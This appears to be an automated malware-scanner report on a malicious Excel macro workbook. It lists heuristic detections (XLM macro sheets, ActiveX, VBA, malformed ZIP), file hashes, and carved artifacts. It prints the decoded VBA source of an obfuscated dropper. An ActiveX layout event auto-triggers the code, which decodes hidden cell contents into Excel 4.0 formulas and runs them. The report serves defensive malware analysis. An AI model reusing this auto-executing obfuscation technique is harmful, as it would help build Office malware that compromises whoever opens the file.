Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 c9aa6f234f2c1077…

MALICIOUS

Office (OOXML) / .XLSM

33.6 KB First seen: 2026-05-20
MD5: 1e5d0bdf39aaea20c463152b84eaa1ad SHA-1: fd65ceff6221c99e8dbc6c2917a43fb526eec030 SHA-256: c9aa6f234f2c1077aa6bf2039e304314a5faeb380888d256140f8e1ecc0237b6
130 Risk Score

Heuristics 5

  • Excel 4.0 macro sheet (2 sheet(s)) critical OOXML_XLM_MACROSHEET
    Malformed OOXML local headers contain an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and is rarely used in modern legitimate workbooks.
  • ActiveX control high OOXML_ACTIVEX
    Malformed OOXML local headers contain ActiveX controls — can execute code
  • VBA project inside OOXML medium OOXML_VBA
    Malformed OOXML local headers contain vbaProject.bin — VBA macros present
  • Malformed OOXML package with recoverable local headers low OOXML_MALFORMED_ZIP_LOCAL_HEADERS
    The OOXML ZIP central directory is invalid or missing, but local file headers expose a recoverable Office package. This can create parser divergence between tolerant Office/ZIP readers and scanners that rely only on the central directory.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
vbaProject_00.bin vba-project Malformed OOXML local-header VBA project: xl/vbaProject.bin 18944 bytes
SHA-256: a97b287e0a0f08bffc3e0ceda11ad21ce4ddc84be6e76276d0cbf8b7a4789e38
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from malformed OOXML local headers) 1774 bytes
SHA-256: a9b2d58fa94069ee7e289ee810bf2aebd34b12fdedfc49cd82587b871aa55e8e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "brt_apri_a, 7, 0, MSForms, Frame"
Sub Sal_Apr()
Application.OnTime Now, "querytabs"
End Sub
Private Sub brt_apri_a_Layout()
Sal_Apr
End Sub

Attribute VB_Name = "Modulo1"
Function limms()
limms = "_a"
End Function
Function tutto1() As String
tutto1 = "ORN"
End Function
Sub mesagiossd()
On Error Resume Next
Run (((((((((((Right(limms & "i" & tutto1 & limms, Fogglios("r" & limms & tutto1 & limms)))))))))))))
End Sub
Private Function Fogglios(g As String)
Fogglios = Len(g) - 3
End Function
Sub querytabs()
re = "=RI": Dim z As Integer: z = 1
h = "T" & tutto1 & "O()"
Sheets(z).Cells(7, z).value = re & h
m = questaA((re & h), 5)
Sheets(z).Cells(z, z).Name = tutto1 & limms: a = z * 3:
For Each U In Sheets(2).UsedRange.SpecialCells(xlCellTypeConstants): b = b & U: Next
For S = a To Len(b) Step a
If (S Mod 2) Then w = -1 Else w = z
mm = mm & Chr(Asc(Mid(b, S, z)) + w): Next
gg = Split(mm, "|")
For Each Q In gg
m = questaA("=" & Replace(Q, "[", "J"), z)
mesagiossd
Next
End Sub
Function questaA(w As String, d As Integer)
nn = 1
Sheets(nn).Cells(d, nn).FormulaLocal = w
End Function
activex_00.bin ooxml-activex Malformed OOXML ActiveX control: xl/activeX/activeX1.bin 2560 bytes
SHA-256: b127a721552d75b1e47d8283a2f8071cf9f51567b54b3ecaa7e2e65a82538694
xlm_sheet_04.xml xlm-macrosheet Malformed OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 885 bytes
SHA-256: 66a73c54e6ce77f7a7273f0dcd0e1f5e17e387e034ea8c037999e896769a7a49
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A1"/><sheetViews><sheetView showFormulas="1" topLeftCell="I50" workbookViewId="0"><selection activeCell="F81" sqref="F81"/></sheetView></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" horizontalDpi="300" verticalDpi="300" r:id="rId1"/></xm:macrosheet>
xlm_sheet_05.xml xlm-macrosheet Malformed OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 985 bytes
SHA-256: 559be326357c3e44ef6adf86eb55c19f7041f0cb92e73bcc223e48b8c0008f0b
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="C24"/><sheetViews><sheetView showFormulas="1" topLeftCell="A43" workbookViewId="0"><selection activeCell="E60" sqref="E60"/></sheetView></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData><row r="24" spans="3:3" x14ac:dyDescent="0.25"><c r="C24" s="1" t="s"><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" horizontalDpi="300" verticalDpi="300" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.